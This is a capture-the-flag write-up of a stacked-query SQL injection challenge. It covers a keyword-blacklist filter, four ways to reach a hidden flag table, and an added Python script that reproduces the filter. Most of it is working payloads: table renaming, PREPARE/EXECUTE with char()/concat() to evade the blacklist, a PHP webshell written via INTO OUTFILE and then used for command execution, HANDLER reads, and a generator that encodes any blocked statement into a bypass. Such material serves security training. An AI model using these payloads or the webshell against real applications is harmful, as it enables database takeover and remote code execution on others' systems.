# 随便注

A "master key" payload (the classic always-true `or 1=1` style) returns every row, which confirms the injection point. Trying a UNION query next reveals that there is a WAF, which echoes its own check back:

```
return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);
```

Stacked queries are allowed and `show` is not on the blacklist, so enumerate the table names:

```
1';show tables; #
```

Dump the columns of `words`:

```
1'; show columns from `words`;#
```

Dump the columns of `1919810931114514`:

```
1'; show columns from `1919810931114514` ;#
```

Both statements quote the table name with backticks. For `words` this is optional, but for the all-digit name `1919810931114514` it is required, otherwise MySQL parses the name as a number.

<figure><img src="/files/IyrQRyytplX5WJKVmuNw" alt=""><figcaption></figcaption></figure>

The output shows that the application queries the `words` table, but the real flag lives in `1919810931114514`.

From here there are several ways to get the flag.

**1. Official approach**

```
1'; alter table words rename to words1; alter table `1919810931114514` rename to words; alter table words change flag id varchar(100);#
```

Split into separate statements it reads:

```
1';
alter table words rename to words1;
alter table `1919810931114514` rename to words;
alter table words change flag id varchar(100);
#
```

Rename `words` to `words1`, rename `1919810931114514` to `words`, and change the `flag` column of the new `words` to `id`. The application's own lookup on `id` now hits the renamed flag table, so a normal request returns the flag. Note that this permanently rewrites the schema (`alter` and `rename` are not on the blacklist), which is fine in a throwaway CTF instance but is the noisiest of the four approaches.

**2. Prepared statements to bypass the keyword filter**

Here char() turns a list of ASCII codes into the string `select`, concat() glues it to the rest of the statement, and the assembled text is run through PREPARE/EXECUTE. The keyword never appears literally in the request, so the regex has nothing to match:

```
1';
SET @sql=concat(char(115,101,108,101,99,116)," * from `1919810931114514`");
PREPARE sqla from @sql;
EXECUTE sqla;
#
```

Alternatively, without char(), simply splitting the keyword into fragments and concatenating them also gets past the filter:

```
-1';
SET @sql = CONCAT('se','lect * from `1919810931114514`;');
PREPARE sqla from @sql;
EXECUTE sqla;
#
```

**3. RCE**

Error-based injection shows the database user is `root`, so write a webshell to disk and take control directly. This only works if `secure_file_priv` permits writing to the web root and the MySQL process has write access there, which is the case in this challenge.

Write the shell first. The `.` in `1.php` is on the blacklist, so it is supplied as `char(46)`, and `select` is split into `"s","elect"` as in approach 2:

```
1';
Set @sql=concat("s","elect '<?php @print_r(`$_GET[oatmeal]`);?>' into outfile '/var/www/html/1",char(46),"php'");
PREPARE sqla from @sql;
EXECUTE sqla;
#
```

RCE: the shell runs whatever is passed in `oatmeal` through PHP's backtick operator, so call the `mysql` client as root and query the flag table directly:

```
/1.php?oatmeal=mysql -uroot -proot -e"use supersqli;select flag from \`1919810931114514\`;"
```

The response contains the flag.

**4. handler**

MySQL's HANDLER statement reads a table row by row without going through SELECT, so it is not matched by the filter at all:

```
1';
handler `1919810931114514` open as oatmeal;
handler oatmeal read first;
handler oatmeal close;#
```
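As an added example that is not part of the original writeup, the following Python reproduces the WAF regex shown at the top of the page and the char()/concat() trick of approach 2, so each payload can be checked against the filter offline before it is sent. It generalises the page's single instance (encoding `select`) to every blacklisted fragment in a statement, including the `.` that approach 3 has to hide as `char(46)`. The helper names `waf_blocks`, `mysql_char`, `prepare_payload` and `check_all` are my own, and the `union probe` and `outfile literal` entries are constructed negative cases; the other payloads are the page's, collapsed to one line.

```python
import re

# Reproduction of the challenge WAF: preg_match(.../i) rejects the request if
# any of these fragments appears anywhere in the input, case-insensitively.
WAF_RE = re.compile(r"select|update|delete|drop|insert|where|\.", re.IGNORECASE)


def waf_blocks(inject: str) -> bool:
    """True if the challenge WAF would reject this input."""
    return WAF_RE.search(inject) is not None


def mysql_char(word: str) -> str:
    """Encode a string as a MySQL char() call: 'select' -> 'char(115,101,108,101,99,116)'."""
    return "char(" + ",".join(str(ord(c)) for c in word) + ")"


def prepare_payload(sql: str, stmt: str = "sqla") -> str:
    """Turn a statement the WAF would block into a stacked PREPARE/EXECUTE payload.

    Every blacklisted fragment (keyword or '.') is replaced by char(); everything
    else stays as a double-quoted MySQL string literal, and the pieces are joined
    with concat() exactly as in approach 2. Assumption: the statement contains no
    double quotes (the page's payloads only use single quotes and backticks).
    """
    pieces = []
    pos = 0
    for m in WAF_RE.finditer(sql):
        if m.start() > pos:
            pieces.append('"' + sql[pos:m.start()] + '"')
        pieces.append(mysql_char(m.group(0)))
        pos = m.end()
    if pos < len(sql):
        pieces.append('"' + sql[pos:] + '"')
    joined = ",".join(pieces)
    return f"1';SET @sql=concat({joined});PREPARE {stmt} from @sql;EXECUTE {stmt};#"


# Page payloads on one line each, plus two constructed negatives ("union probe",
# "outfile literal") that contain a literal SELECT or a '.' and must be blocked.
PAGE_PAYLOADS = {
    "show tables": "1';show tables; #",
    "union probe": "1' union select 1,2,3#",
    "rename": ("1'; alter table words rename to words1; "
               "alter table `1919810931114514` rename to words; "
               "alter table words change flag id varchar(100);#"),
    "prepare": prepare_payload("select * from `1919810931114514`"),
    "outfile literal": "1'; select 'x' into outfile '/var/www/html/1.php';#",
    "outfile": prepare_payload(
        "select '<?php @print_r(`$_GET[oatmeal]`);?>' into outfile '/var/www/html/1.php'"),
    "handler": ("1'; handler `1919810931114514` open as oatmeal; "
                "handler oatmeal read first; handler oatmeal close;#"),
}


def check_all() -> dict:
    """Map each payload name to True if the WAF lets it through."""
    return {name: not waf_blocks(p) for name, p in PAGE_PAYLOADS.items()}


if __name__ == "__main__":
    for name, ok in check_all().items():
        print(f"{'pass ' if ok else 'BLOCK'}  {name}: {PAGE_PAYLOADS[name]}")
```

Running the script lists which payloads the regex would stop; only the two literal-SELECT / literal-dot entries are blocked, while the rename, PREPARE, char(46) outfile and HANDLER payloads all pass, which is exactly why each of the four approaches above works.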

